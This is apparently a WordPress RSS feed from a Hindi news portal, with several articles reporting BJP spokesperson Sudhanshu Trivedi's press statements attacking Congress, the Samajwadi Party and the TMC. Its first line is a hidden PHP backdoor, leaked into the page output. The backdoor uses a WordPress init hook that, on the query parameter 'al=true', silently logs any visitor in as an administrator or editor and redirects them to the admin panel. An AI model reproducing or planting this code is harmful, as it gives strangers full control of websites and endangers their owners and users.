// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Sudhanshu Trivedi – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 27 Feb 2026 17:15:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 विदेशी फंडिंग और जासूसी के आरोपों पर घिरे गांधी परिवार, सुधांशु त्रिवेदी ने मांगा जवाब https://pratyushaashakinayikiran.com/?p=201322 Fri, 27 Feb 2026 17:15:00 +0000 https://pratyushaashakinayikiran.com/?p=201322 नई दिल्ली
भारतीय जनता पार्टी के सांसद और राष्ट्रीय प्रवक्ता सुधांशु त्रिवेदी ने शुक्रवार को भाजपा मुख्यालय पर प्रेसवार्ता कर कांग्रेस पर तीखा हमला बोलते हुए पूर्व प्रधानमंत्री इंदिरा गांधी के दौर को लेकर कई गंभीर सवाल उठाए। उन्होंने दावा किया कि कुछ विदेशी लेखकों और अभिलेखों में ऐसे उल्लेख हैं, जिन पर कांग्रेस को जवाब देना चाहिए। राष्ट्रीय प्रवक्ता सुधांशु त्रिवेदी ने कहा कि पॉल मैगॉर की किताब ‘स्पाइंग इन साउथ एशिया’ में यह लिखा गया है कि उस समय भारत की व्यवस्था का शायद ही कोई हिस्सा रहा हो जो अमेरिका की खुफिया एजेंसी सीआईए की पहुंच से बाहर रहा हो। उन्होंने आरोप लगाया कि पुस्तक में यह भी उल्लेख है कि पोलित ब्यूरो की ओर से कांग्रेस पार्टी को दो मिलियन की राशि दी गई थी। उन्होंने कहा कि ये बातें संबंधित देशों के पूर्व अधिकारियों द्वारा दर्ज की गई हैं।

सुधांशु त्रिवेदी ने ‘मित्रोखिन आर्काइव्ज़’ का हवाला देते हुए कहा कि उसमें केजीबी संपर्कों का जिक्र है और दावा किया गया है कि वर्ष 1976 में कांग्रेस पार्टी को दो मिलियन रुपए और बाद में दस लाख रुपए दिए गए थे। उन्होंने कहा कि पचास साल पहले यह रकम बहुत बड़ी मानी जाती थी। भाजपा सांसद ने सवाल किया कि इन पुस्तकों में दर्ज सीधे दावों पर कांग्रेस की ओर से अब तक कोई स्पष्ट जवाब क्यों नहीं आया है। उन्होंने कच्चातीवू द्वीप को श्रीलंका को सौंपे जाने और 1971 के युद्ध के बाद की परिस्थितियों का भी उल्लेख किया। त्रिवेदी ने कहा कि 93 हजार पाकिस्तानी युद्धबंदियों की रिहाई और 54 भारतीय सैनिकों की वापसी न होने जैसे मुद्दों पर भी देश जवाब चाहता है कि उस समय किन आधारों पर फैसले लिए गए।

वहीं, दिल्ली की एक अदालत द्वारा आम आदमी पार्टी के नेताओं अरविंद केजरीवाल और मनीष सिसोदिया को कथित आबकारी नीति मामले में बरी किए जाने पर भी उन्होंने प्रतिक्रिया दी। त्रिवेदी ने कहा कि यदि कोई सबूत नहीं था, तो अदालत ने आरोप तय करने की अनुमति कैसे दी? उन्होंने इसे तकनीकी विषय बताते हुए कहा कि अदालत का विस्तृत फैसला पढ़ने के बाद पार्टी संरचित प्रतिक्रिया देगी। उन्होंने यह भी कहा कि करीब 100 सिम कार्ड और मोबाइल फोन नष्ट होने की बात सामने आई है, जिससे साक्ष्यों की कमी की स्थिति उत्पन्न हुई होगी। त्रिवेदी ने कहा कि मामले में केंद्रीय जांच ब्यूरो आगे की कार्रवाई पर विचार करेगा और पार्टी निर्णय का विस्तार से अध्ययन करने के बाद अपना पक्ष रखेगी।

]]>
सुधांशु त्रिवेदी का कांग्रेस पर तंज: ‘खानदानी समस्या का इलाज जनता करेगी’ https://pratyushaashakinayikiran.com/?p=200216 Mon, 23 Feb 2026 14:20:00 +0000 https://pratyushaashakinayikiran.com/?p=200216 नई दिल्ली
भारतीय जनता पार्टी (भाजपा) के राष्ट्रीय प्रवक्ता और राज्यसभा सांसद सुधांशु त्रिवेदी ने सोमवार को प्रेस कॉन्फ्रेंस में एआई समिट के दौरान कांग्रेस कार्यकर्ताओं के विरोध-प्रदर्शन पर तीखा हमला बोला है। उन्होंने कहा कि समिट में एक तरफ हमारी युवा शक्ति की शैक्षिक क्षमता का बहुत उच्च कोटि का प्रदर्शन हुआ, तो वहीं कांग्रेस की निम्नता और नग्नता का कुटिल प्रदर्शन देखने को मिला। उन्होंने कहा कि अभी तक पूरा देश इस विषय को लेकर आक्रोशित है और अब कांग्रेस पार्टी के गठबंधन सहयोगियों की ओर से भी इस पर आपत्ति जताई गई है।

 अब कांग्रेस पार्टी के अंदर से भी यह स्वर गूंजने लगा है कि इस तरह के अंतरराष्ट्रीय आयोजनों में गरिमापूर्ण आचरण की अपेक्षा होती है। ऐसे आयोजनों में इस प्रकार का हल्का, छिछोरा और नग्न आचरण करना निहायत निंदनीय है। उन्होंने कहा कि कांग्रेस की वरिष्ठ नेता रहीं और पूर्व केंद्रीय मंत्री मार्गरेट अल्वा ने भी कहा है कि अंतरराष्ट्रीय आयोजनों के दौरान जिम्मेदारी की भावना होनी चाहिए। उन्होंने यह भी कहा कि ऐसे आयोजनों में गरिमा और अनुशासन बनाए रखना सभी की जिम्मेदारी है। इसलिए हम यह कहना चाहते हैं कि कांग्रेस पार्टी को अब यह समझना चाहिए कि वह जिस प्रकार के विचारों के अनुसार चल रही है, उसे जनता नकार रही है, गठबंधन सहयोगी नकार रहे हैं और अब पार्टी के अंदर के वरिष्ठ एवं पुराने नेता भी उन्हें नकार रहे हैं। जनता उन्हें पूरी तरह ठुकरा रही है।

उन्होंने यह भी कहा कि यह समस्या कांग्रेस के अंदर आज की नहीं है, बल्कि यह खानदानी समस्या है। मैं कहना चाहता हूं कि यह समस्या कांग्रेस के नेताओं से ज्यादा कांग्रेस के परिवार की समस्या है। एक जमाने में भारत को सपेरों का देश कहा जाता था। 28 सितंबर 1955 को जवाहरलाल नेहरू की एक प्रेस कॉन्फ्रेंस में उनसे पूछा गया था कि क्या भारत को सपेरों का देश कहना उचित है? उन्होंने उत्तर दिया था कि भारत को सपेरों का देश कहने में कोई बुराई नहीं है, क्योंकि इससे पर्यटकों की संतुष्टि होती है। इसका अर्थ यह हुआ कि आप भारत की उसी पहचान को बनाए रखना चाहते थे। इसी कारण आज जब प्रधानमंत्री नरेंद्र मोदी के नेतृत्व में भारत एआई की नई उड़ान की ओर बढ़ रहा है, तो यह आपसे बर्दाश्त नहीं हो रहा है।

उन्होंने तीखा हमला बोलते हुए कहा कि उन्हें लगता है कि कांग्रेस की इस खानदानी बीमारी का इलाज देश की जनता करेगी। समस्या यह है कि जो भी उनकी पार्टी या गठबंधन के साथी उन्हें समझाना चाहते हैं, उनकी बात वे सुनना ही नहीं चाहते।
उन्होंने यह भी कहा कि कुछ महीने पहले तेलंगाना के मुख्यमंत्री रेवंत रेड्डी ने कहा था कि राज्य के पास पूंजी निवेश के लिए पर्याप्त धन नहीं है। फिर भी उन्होंने कहा कि वे गांधी परिवार और कांग्रेस के लिए 1,000 करोड़ रुपए खर्च करने को तैयार हैं। जब हम राज्य सरकार में थे, तब हमने गुजरात मॉडल पेश किया था, जिसकी अंतरराष्ट्रीय स्तर पर भी सराहना हुई थी। अब कांग्रेस को जवाब देना होगा कि उन्होंने शासन का कौन सा मॉडल पेश किया है?

सुधांशु त्रिवेदी ने सवाल उठाया कि कांग्रेस कई राज्यों में सत्ता में है और तीन राज्यों में पूर्ण बहुमत के साथ सरकार चला रही है, हिमाचल, तेलंगाना और कर्नाटक। हमने गुजरात मॉडल दिया है। मैं कांग्रेस से पूछना चाहता हूं, आपका मॉडल क्या है? आपने कर्नाटक का कौन सा मॉडल देश के सामने रखा है? हिमाचल का कौन सा मॉडल पेश किया है? दिखाइए, प्रदर्शन करके बताइए।
तेलंगाना के संदर्भ में उन्होंने कहा कि वहां कांग्रेस की राजनीति की परिभाषा अलग तरह से पेश की जा रही है। उन्होंने कहा कि आज इन बयानों के बाद किसी भी प्रकार का किंतु-परंतु नहीं रह गया है और उनके अनुसार कांग्रेस न केवल राष्ट्र-विरोधी गतिविधियों में शामिल रहती है, बल्कि जिन राज्यों में सत्ता में रहती है, वहां की जनता का भी भारी अहित करती है।

]]>
कर्नाटक में 6,000 करोड़ का शराब घोटाला! सुधांशु त्रिवेदी ने कांग्रेस पर साधा निशाना https://pratyushaashakinayikiran.com/?p=194794 Fri, 30 Jan 2026 16:55:00 +0000 https://pratyushaashakinayikiran.com/?p=194794 नई दिल्ली
भाजपा के राष्ट्रीय प्रवक्ता सुधांशु त्रिवेदी ने नई दिल्ली स्थित भाजपा मुख्यालय में शुक्रवार को प्रेसवार्ता कर कांग्रेस पर निशाना साधा है। उन्होंने कहा कि कर्नाटक में कांग्रेस सरकार पर 6,000 करोड़ रुपए के शराब घोटाले का आरोप लगाया गया है। सुधांशु त्रिवेदी ने कहा कि जब केंद्र में भाजपा विपक्ष में थी, तब भी गुजरात मॉडल की खूब चर्चा होती थी, लेकिन आज हम बात करेंगे कि कांग्रेस पार्टी जिन राज्यों में सरकार चला रही है, वहां वह किस तरह का मॉडल पेश कर रही है। कांग्रेस सरकार पर 6,000 करोड़ रुपए के शराब घोटाले का आरोप लगा है। यह आरोप केंद्र सरकार ने नहीं, बल्कि उसी राज्य के शराब व्यापारियों ने लगाया है। उन्होंने कहा कि आज कांग्रेस की जिन राज्यों में सरकार है, वे कैसा मॉडल प्रस्तुत कर रहे हैं, उसकी बानगी हम आपके सामने रखना चाहते हैं। वाइन मर्चेंट्स एसोसिएशन ने बताया है कि रेस्टोरेंट से लेकर होटलों तक, किस प्रकार अलॉटमेंट के नाम पर सरकार के विभिन्न स्तरों पर बैठे मंत्रियों और अन्य लोगों तक यह पैसा जाता था।
सुधांशु त्रिवेदी ने कहा कि अगर प्रदेश की जनता किसी भी दल को सत्ता देती है तो अपेक्षा करती है कि वह सरकार विकास और सुशासन के मार्ग पर प्रदेश को ले जाएगी। मध्य प्रदेश में हमने ऐसी योजनाएं लागू की थीं, जिससे बच्चियों का भविष्य सुरक्षित हो सके। कर्नाटक में जब 2008 में हमारी सरकार थी, तब हमने किसानों को एक साल के लिए बिना ब्याज के ऋण देने का प्रयास किया था और सफल रहे थे।
उन्होंने कहा कि जैसे हमारी सरकार के पास विकास का एक मॉडल है, वैसे ही कांग्रेस के पास भी अपना मॉडल है जहां मुख्यमंत्री और उप-मुख्यमंत्री के बीच लगातार सत्ता की लड़ाई चलती रहती है, चाहे वह कर्नाटक हो, मध्य प्रदेश हो या राजस्थान हो। कांग्रेस ने कर्नाटक के लोगों के साथ बहुत बड़ा धोखा किया है, जिन्होंने उन्हें इतना बड़ा जनादेश दिया था।
भाजपा के राष्ट्रीय प्रवक्ता ने कहा कि कलकत्ता हाईकोर्ट ने पश्चिम बंगाल सरकार को एक सख्त निर्देश दिया है, जिसमें कहा गया है कि सीमा पर बाड़ लगाने के काम के लिए जमीन आवंटन की प्रक्रिया 31 मार्च 2026 तक साफ की जाए। यह साफ दिखाता है कि घुसपैठियों के वोटों के लालच में राष्ट्रीय सुरक्षा से समझौता किया गया। इस फैसले से यह सच्चाई सामने आ गई है कि टीएमसी घुसपैठियों के प्रति हमदर्दी रखती है।
सुधांशु त्रिवेदी ने कहा कि पश्चिम बंगाल के लोग तृणमूल सरकार को नकार देंगे, जिसने राष्ट्रीय सुरक्षा को खतरे में डाला है और आने वाले चुनावों में भाजपा को चुनेंगे। उन्होंने कहा कि लेकिन यह एक बहुत दुखद, दुर्भाग्यपूर्ण और विचलित करने वाला प्रश्न उठाता है। यह दर्शाता है कि पश्चिम बंगाल में तृणमूल कांग्रेस के शासनकाल में देश की सीमाओं पर सुरक्षा की कीमत पर, घुसपैठियों के वोट के लालच में, केवल क्षुद्र राजनीतिक स्वार्थ के लिए राष्ट्र की सुरक्षा का सौदा किया जा रहा था। उच्च न्यायालय का यह निर्णय तृणमूल कांग्रेस की नीतियों पर करारा प्रहार है।

]]>
सुधांशु त्रिवेदी ने पाक को खूब सुनाया कहा झूठ बोलना बंद करो, कश्मीर कभी नहीं मिलेगा https://pratyushaashakinayikiran.com/?p=96109 Sat, 09 Nov 2024 16:56:00 +0000 https://pratyushaashakinayikiran.com/?p=96109 नई दिल्ली

संयुक्त राष्ट्र में शांति रक्षा अभियानों पर बहस के दौरान पाकिस्तान द्वारा जम्मू कश्मीर का जिक्र किए जाने पर भारत ने पड़ोसी देश पर झूठ फैलाने का आरोप लगाते हुए उसकी आलोचना की। राज्यसभा सदस्य और भारतीय जनता पार्टी (भाजपा) के राष्ट्रीय प्रवक्ता सुधांशु त्रिवेदी ने कहा, ‘‘भारत ने पाकिस्तान द्वारा की गईं टिप्पणियों पर जवाब देने के अपने अधिकार को चुना है, जिसने एक बार फिर इस प्रतिष्ठित निकाय को अपने एजेंडे से भटकाने का प्रयास किया है।’’

उन्होंने शुक्रवार को यहां संयुक्त राष्ट्र महासभा की विशेष राजनीतिक एवं वि-उपनिवेशीकरण (चौथी समिति) में शांति रक्षा अभियानों पर चर्चा के दौरान ये टिप्पणियां कीं। सुधांशु त्रिवेदी ने कहा कि केंद्र शासित प्रदेश जम्मू कश्मीर ‘‘भारत का अभिन्न अंग था, है, और हमेशा रहेगा।’’

उन्होंने कहा, ‘‘जम्मू कश्मीर के लोगों ने हाल में अपने लोकतांत्रिक और चुनाव अधिकारों का इस्तेमाल किया तथा एक नई सरकार चुनी। पाकिस्तान को ऐसी बयानबाजी और झूठ से बाज आना चाहिए क्योंकि इससे तथ्य नहीं बदलेंगे।’’ उन्होंने कहा कि संयुक्त राष्ट्र के इस मंच के प्रतिष्ठित सदस्यों के सम्मान में भारत संयुक्त राष्ट्र की प्रक्रियाओं का दुरुपयोग करने के पाकिस्तान के किसी भी प्रयास का जवाब देने से परहेज करेगा।

उन्होंने भारत की ओर से यह कड़ी प्रतिक्रिया तब दी है जब पाकिस्तानी प्रतिनिधि ने नियंत्रण रेखा पर संघर्षविराम पर नजर रखने वाले भारत और पाकिस्तान में संयुक्त राष्ट्र सैन्य पर्यवेक्षक समूह (यूएनएमओजीआईपी) के बारे में बात की। भारत का कहना है कि शिमला समझौते और उसके परिणामस्वरूप नियंत्रण रेखा की स्थापना के बाद यूएनएमओजीआईपी की उपयोगिता समाप्त हो गई है और यह अप्रासंगिक है।

सुंधांशु त्रिवेदी ने बाद में सोशल मीडिया मंच ‘एक्स’ पर एक पोस्ट में कहा कि शांति रक्षा अभियानों पर संयुक्त राष्ट्र में चर्चा के दौरान पाकिस्तान के प्रतिनिधि ने संयुक्त राष्ट्र शांति रक्षा विषय पर बोलते हुए ‘‘विषय को भटकाने की कोशिश की और अनावश्यक रूप से उल्लेख किया कि संयुक्त राष्ट्र शांति सैनिकों के साथ पाकिस्तान की भागीदारी तब शुरू हुई जब संयुक्त राष्ट्र ने 1948 में जम्मू और कश्मीर क्षेत्र में शांति सैनिकों को तैनात किया था।’’

उन्होंने कहा कि ‘‘इस टिप्पणी पर कड़ी आपत्ति जताते हुए’’ उन्होंने जवाब देने के अधिकार का इस्तेमाल किया और ‘‘मंच पर दृढ़तापूर्वक कहा कि केंद्र शासित प्रदेश जम्मू कश्मीर भारत का अभिन्न अंग था, है, और हमेशा रहेगा।’’ भाजपा नेता ने कहा, ‘‘जम्मू कश्मीर में हाल में उचित तरीके से लोकतांत्रिक चुनाव हुआ। इसलिए संयुक्त राष्ट्र के इस प्रतिष्ठित मंच का इस्तेमाल इन प्रकार के भ्रामक शब्दों का उल्लेख करने में नहीं किया जा सकता।’’ उन्होंने कहा कि यह प्रधानमंत्री नरेन्द्र मोदी की अगुवाई वाली सरकार की ‘‘ठोस विदेश नीतियों के कारण संभव’’ हो सका है।

सुंधांशु त्रिवेदी भारत के 12 संसद सदस्यों के प्रतिनिधिमंडल का हिस्सा हैं जो संयुक्त राष्ट्र में विभिन्न बैठकों के लिए इस विश्व निकाय की यात्रा कर रहा है।

इससे पहले, शांति रक्षा अभियानों की व्यापक समीक्षा पर एक बयान देते हुए त्रिवेदी ने कहा कि हालिया संघर्ष अधिक चुनौतीपूर्ण हैं और अब इसमें आतंकवाद तथा सशस्त्र समूह भी शामिल हैं जो अपने उद्देश्यों की पूर्ति के लिए स्थिति का फायदा उठा रहे हैं।

उन्होंने कहा, ‘‘भारत संयुक्त राष्ट्र शांतिरक्षा अभियानों में सबसे बड़े सैन्य दल के के रूप में शांतिरक्षा प्रयासों में योगदान देने के प्रयास में सबसे आगे है।’’

]]>
कांग्रेस जब भी सत्ता में आई, देश के लिए आर्थिक चुनौतियां लाई : भाजपा https://pratyushaashakinayikiran.com/?p=93578 Mon, 04 Nov 2024 16:36:00 +0000 https://pratyushaashakinayikiran.com/?p=93578 नई दिल्ली
 भारतीय जनता पार्टी ने  कांग्रेस पार्टी पर निशाना साधते हुए कहा कि कांग्रेस अपने किसी भी वादे को कभी भी पूरी नहीं कर पाई। कांग्रेस पार्टी जब-जब जिस राज्य की सत्ता में आती है, उस राज्य और देश के लिए आर्थिक चुनौतियां लेकर आती है।

 भाजपा मुख्यालय में आयोजित प्रेस वार्ता में सांसद सुधांशु त्रिवेदी ने कहा कि कांग्रेस की सरकार जिन राज्यों में है- वहां की आर्थिक स्थिति खराब हो चुकी है। हिमाचल प्रदेश में तो उनके पास इतना भी पैसा नहीं रह गया है कि वो सही ढंग से सैलरी दे सकें। ऐसी ही हालत कर्नाटक में है। ये दर्शाता है कि कांग्रेस जब-जब सत्ता में आती है तो जो कहा गया… वो कभी पूरा नहीं कर पाती है। इसके बावजूद अफसोस की बात है कि कुछ लोग ऐसे होते हैं, जिनके दिमाग इतने खाली होते हैं कि सत्ता में आने पर खजाना खाली कर देते हैं लेकिन जनता को वांछित व्यवस्था उपलब्ध नहीं कराते हैं। इसी तरह की कांग्रेस पार्टी और विपक्षी दल हैं।

सुधांशु ने कहा कि कांग्रेस पार्टी के राष्ट्रीय अध्यक्ष के मुंह से जो निकला है, उन्होंने दिखाया है कि अगर सत्ता जनता के लिए संपत्ति और समृद्धि बननी चाहिए तो उनके हाथ में आकर वो विपत्ति बन जाती है। इससे हटकर हम प्रधानमंत्री नरेन्द्र मोदी के नेतृत्व में किस प्रकार से जन-जन के कल्याण के लिए आगे बढ़ते हैं, उसके कई प्रमाण हैं। उन्होंने कहा कि लग्जरियस आइटम्म पर टैक्स और जरूरतमंद जनता को फ्री अनाज मुहैया कराना… मोदी का ये विचार उस भगवान राम के आर्दश से प्रेरित है, जिनके लिए लिखा गया है, “मणि-माणिक महंगे किए, सहजे तृण, जल, नाज। तुलसी सोई जानिए, राम गरीब नवाज॥” आज मोदी के नेतृत्व में भारत विकास के रास्ते पर तेजी से आगे बढ़ रहा है।

सुधांशु ने कहा कि प्रधानमंत्री मोदी ने कहा है कि ना खाऊंगा और ना खाने दूंगा। इससे कांग्रेस के दिल का दर्द इतना उभरा होगा कि जब से मोदी आए हैं, उनका खाना मुहाल हो गया है। जब राजीव गांधी कहते थे कि एक रुपये भेजता हूं तो जनता के पास 15 पैसे ही पहुंचते हैं… 85 पैसे बीच में गायब हो जाते हैं। इसलिए कांग्रेस की छटपटाहट अब समझी जा सकती है।

 

]]>
कांग्रेस के शीर्ष नेता भ्रष्टाचार और गरीब की जमीन हड़पने में शामिल हैं : सुधांशु त्रिवेदी https://pratyushaashakinayikiran.com/?p=84380 Mon, 14 Oct 2024 17:56:00 +0000 https://pratyushaashakinayikiran.com/?p=84380 नई दिल्ली
भाजपा राष्ट्रीय प्रवक्ता सुधांशु त्रिवेदी ने आरोप लगाया है कि कांग्रेस के पूर्व राष्ट्रीय अध्यक्ष (सोनिया गांधी और राहुल गांधी) से लेकर वर्तमान राष्ट्रीय अध्यक्ष मल्लिकार्जुन खड़गे, कर्नाटक के वर्तमान मुख्यमंत्री सिद्धारमैया एवं उपमुख्यमंत्री डीके शिवकुमार से लेकर अन्य राज्यों के पूर्व मुख्यमंत्री कमलनाथ, अशोक गहलोत और भूपेश बघेल तक कांग्रेस का सभी शीर्ष नेता गरीबों की जमीन हड़पने में शामिल हैं। उन्होंने कहा कि ये सब भ्रष्टाचार में और गरीब की जमीन हड़पने जैसे मामले में शामिल हैं।

भाजपा राष्ट्रीय मुख्यालय में मीडिया को संबोधित करते हुए सुधांशु त्रिवेदी ने कटाक्ष किया कि सोनिया गांधी और राहुल गांधी के विचारों से प्रेरित होकर कांग्रेस पार्टी देश में भू-हड़प अभियान चला रही है। उन्होंने कांग्रेस के राष्ट्रीय अध्यक्ष मल्लिकार्जुन खड़गे के परिवार के ट्रस्ट द्वारा कर्नाटक में आवंटित की गई जमीन को लौटाने के प्रकरण को भ्रष्टाचार की स्वीकारोक्ति बताते हुए कहा कि एक पार्टी के राष्ट्रीय अध्यक्ष पर इस तरह के गंभीर आरोप लगे हैं, जिससे इसकी गंभीरता को समझा जा सकता है।

उन्होंने खड़गे के परिवार और इससे पहले सिद्धारमैया के परिवार द्वारा आवंटित जमीन को लौटाने पर कटाक्ष करते हुए कहा कि ये लोग इसलिए जमीन वापस नहीं कर रहे हैं कि इनकी आत्मा जाग गई है बल्कि अदालत की कार्यवाही के दौरान होने वाली जलालत से बचने के लिए ये जमीन वापस कर रहे हैं। उन्होंने कहा कि राहुल गांधी और सोनिया गांधी को यह बताना चाहिए कि क्या जमीन वापस करने वालों को नैतिकता के आधार पर इस्तीफा नहीं देना चाहिए? अगर मान लिया कि गलती हुई है तो कर्नाटक सरकार एफआईआर कब करेगी?

उन्होंने कांग्रेस और विपक्षी नेताओं की चुप्पी पर सवाल उठाते हुए कहा कि भ्रष्टाचार के इतने गंभीर मामले में इंडी गठबंधन के नेताओं की चुप्पी से यह बात बिल्कुल साफ हो रही है कि भ्रष्टाचार और जनता की जमीन हड़पने के मामले में ये सब एक साथ हैं, मिले हुए हैं और एक दूसरे को मौन समर्थन दे रहे हैं।

भाजपा राष्ट्रीय प्रवक्ता ने कहा कि भ्रष्टाचार जिसकी सहज और स्वाभाविक प्रवृत्ति है, उस कांग्रेस पार्टी के अध्यक्ष पद से अब वह जमीन खिसकती नजर आ रही है। कांग्रेस के राष्ट्रीय अध्यक्ष मल्लिकार्जुन खड़गे के परिवार द्वारा संचालित ट्रस्ट पर आक्षेप लगने के बाद आवंटित भूमि को लौटाने का जो निर्णय लिया है, वह स्पष्ट रूप से प्रमाणित करता है कि सत्ता का दुरुपयोग करके भूमि को हड़पने का कार्य कर्नाटक में सर्वोच्च स्तर से हो रहा था।

उन्होंने कहा कि वर्ष 2015 में उपमुख्यमंत्री डीके शिवकुमार पर लैंड ग्रैब का केस लग चुका है, जोकि 1986 में आवंटित भूमि के समय से चल रहा था। मुडा स्कैम में मुख्यमंत्री सिद्धारमैया पर आरोप लग रहे हैं। केआईएडीबी लैंड आवंटन घोटाले में खड़गे के परिवार के लोग शामिल हैं। इससे पूर्व मध्य प्रदेश में कांग्रेस के मुख्यमंत्री रहे कमलनाथ का नाम सामने आ चुका है। राजस्थान के मुख्यमंत्री रहे अशोक गहलोत का नाम बीकानेर के लैंड स्कैम में सामने आ चुका है। छत्तीसगढ़ के पूर्व मुख्यमंत्री भूपेश बघेल का नाम भी सामने आ चुका है। नेशनल हेराल्ड मामले में सोनिया गांधी और राहुल गांधी पर आरोप है। यानी मुख्यमंत्री हो, उपमुख्यमंत्री हो या पूर्व राष्ट्रीय अध्यक्ष हो या वर्तमान राष्ट्रीय अध्यक्ष हो, कांग्रेस का पूरा शीर्ष नेतृत्व भूमि हड़पने के आंदोलन में समान रूप से संलिप्त है।

राहुल गांधी पर कटाक्ष करते हुए त्रिवेदी ने आगे कहा कि राहुल गांधी मोहब्बत की दुकान की बात करते हैं लेकिन उनकी मोहब्बत की दुकान तो किसी भूमाफिया प्रॉपर्टी डीलर की दुकान नजर आ रही है। कांग्रेस पार्टी पूरी तरह भ्रष्टाचार में लिप्त है।

किसान नेता गुरनाम सिंह चढूनी के बयान को लेकर पूछे गए सवाल के जवाब में उन्होंने कहा कि अब कांग्रेस की कलई खुल गई है। कांग्रेस पार्टी को इस पर सफाई देनी चाहिए। हर गैर राजनीतिक आंदोलन का एकमात्र उद्देश्य सत्ता प्राप्त करना ही होता है।

बहराइच की घटना के बारे में पूछे गए सवाल के जवाब में उन्होंने कहा कि पिछले चार-पांच महीनों में देश में इस तरह की घटनाएं बढ़ी है और रेल सहित इन तमाम घटनाओं को समग्रता से देखने की जरूरत है। यह भारत को कमजोर करने की बड़ी साजिश का हिस्सा है। देश की जनता यह सोचे।

उन्होंने संजय राउत के बयान की भी कड़ी आलोचना करते हुए उन्हें याद दिलाया कि 90 के दशक में बालासाहेब ठाकरे ने अंडरवर्ल्ड के खिलाफ किस तरह से सख्त स्टैंड लिया था लेकिन आज वे अंडरवर्ल्ड का साथ देने वालों के साथ ही खड़े हैं।

 

]]>
पक्‍के समाजवादी हैं तस्‍कर हों या डकैत… SP पर बरसे बीजेपी नेता सुधांशु त्रिवेदी https://pratyushaashakinayikiran.com/?p=60176 Tue, 13 Aug 2024 17:46:00 +0000 https://pratyushaashakinayikiran.com/?p=60176 लखनऊ
 कन्‍नौज के पूर्व ब्‍लॉक प्रमुख नवाब सिंह यादव के कारनामों को लेकर यूपी से लेकर दिल्‍ली की सियासत गर्माई हुई है। पुलिस ने नवाब सिंह को एक दिन पहले 15 साल की लड़की से दुष्‍कर्म के प्रयास में अरेस्‍ट किया है। एक तरफ जहां सपा ने नवाब सिंह यादव से पल्‍ला झाड़ लिया है, वहीं बीजेपी ने सपा पर जोरदार हमला बोला है। दिल्‍ली में आयोजित प्रेस वार्ता में पार्टी प्रवक्‍ता सुधांशु त्रिवेदी ने मशहूर शायर अदम गोंडवी की शायरी सुनाकर समाजवादी पार्टी और अपराध का नाता बता दिया।

मंगलवार को सुधांशु त्रिवेदी ने कहा- 'समाजवादी पार्टी के डीएनए में ही अपराध है। सब जानते हैं कि यूपी में जब जब समाजवादियों की सरकार रही, अपराध सबसे ज्‍यादा उसी समय हुए। एक पुराने समाजवादी और शायर हुआ करते थे अदम गोंडवी। समाजवादी पार्टी में आए हुए आपराधिक तत्‍वों के हौंसले बुलंद होने पर दुखी होकर लिखा था- काजू भुना है प्‍लेट में। व्हिस्की गिलास में। उतरा है रामराज विधायक निवास में। पक्‍के समाजवादी हैं तस्‍कर हों या डकैत। कितना असर है खादी के उजले लिबास में। एक समाजवादी नेता के दिल का दर्द आज के समाजवादी पार्टी के असली राजनीतिक डीएनए को बताने के लिए काफी है।'
'अपराधियों को संरक्षण देती है समाजवादी पार्टी'

बीजेपी प्रवक्‍ता ने कहा- 'अयोध्‍या में हम सबने देखा कि समाजवादी पार्टी के एक नेता मोइद खान पर किसी प्रकार से एक नाबालिग के साथ बलात्‍कार का आरोप लगा। संवेदनशीलता तो छोडि़ए, इस मुद्दे पर किस निर्लज्‍जता के साथ राजनीति की गई, ये हम सबने देखा। इसके बाद कन्‍नौज में सपा से ही जुड़े एक नेता के ऊपर नाबालिग लड़की के साथ रेप के प्रयास का गंभीर आरोप लगा है। अपराध के प्रति संवेदनशीलता एक गंभीर विषय है। कन्‍नौज के इस प्रकरण के ऊपर सपा की एक महिला नेता ने बड़ा असंवेदनशील बयान दिया है। उन्‍होंने कहा कि लड़की जब 15 साल की ही थी तो वह किस प्रकार की नौकरी पाने के लिए नेता के पास गई थी। यह समाजवादी पार्टी की असली फितरत है। यह उनकी अपराधियों को संरक्षण देने की सोच को दर्शाता है।'

मुलायम, अखिलेश और राहुल पर किया प्रहार

बीजेपी प्रवक्‍ता ने बगैर नाम लिए मुलायम सिंह यादव, अखिलेश यादव के साथ राहुल गांधी पर भी प्रहार किया। सुधांशु त्रिवेदी ने कहा- 'उत्‍तर प्रदेश में एक दौर में सपा के नेता ने कहा था कि लड़के हैं। लड़कों से गलती हो जाया करती है। आज मैं यह कहना चाहता हूं कि लोकसभा चुनाव के दौरान जो नेता खुद को यूपी के लड़के बताते थे, उनके साथ के लोग गलत काम कर रहे हैं। जबसे इन दो लड़कों की ताकत बढ़ी है, तबसे अपराधियों की हिम्‍मत भी उसी अनुपात में बढ़ी है। दुख की बात ये है कि इस तरह के विषय में अपराधी की जाति और धर्म नहीं देखना चाहिए।'

]]>
भाजपा के राष्ट्रीय प्रवक्ता सुधांशु त्रिवेदी ने कहा- खुशी और गर्व के मौके पर भी विपक्ष नकारात्मकता फैलाने पर तुला हुआ है https://pratyushaashakinayikiran.com/?p=50062 Wed, 10 Jul 2024 22:26:00 +0000 https://pratyushaashakinayikiran.com/?p=50062 नई दिल्ली
भाजपा के राष्ट्रीय प्रवक्ता सुधांशु त्रिवेदी ने रूस द्वारा अपने सर्वोच्च नागरिक सम्मान से पीएम नरेंद्र मोदी को सम्मानित किए जाने को 140 करोड़ देशवासियों के लिए गर्व और संतुष्टि की अनुभूति का अवसर बताते हुए कांग्रेस समेत अन्य विपक्षी दलों के रवैये पर सवाल उठाया है। भाजपा राष्ट्रीय मुख्यालय में मीडिया से बात करते हुए सुधांशु त्रिवेदी ने कहा कि ये विषय सिर्फ एक सम्मान का नहीं है। प्रधानमंत्री मोदी भारत के इकलौते प्रधानमंत्री हैं, जिन्हें फ्रांस, इजिप्ट, यूएई, सऊदी अरब और फिलिस्तीन जैसे देशों ने अपना सर्वोच्च नागरिक सम्मान दिया है और अब रूस ने भी अपने सर्वोच्च नागरिक सम्मान 'द आर्डर ऑफ सेंट एंड्रयू द एपोस्टल' से सम्मानित किया है।

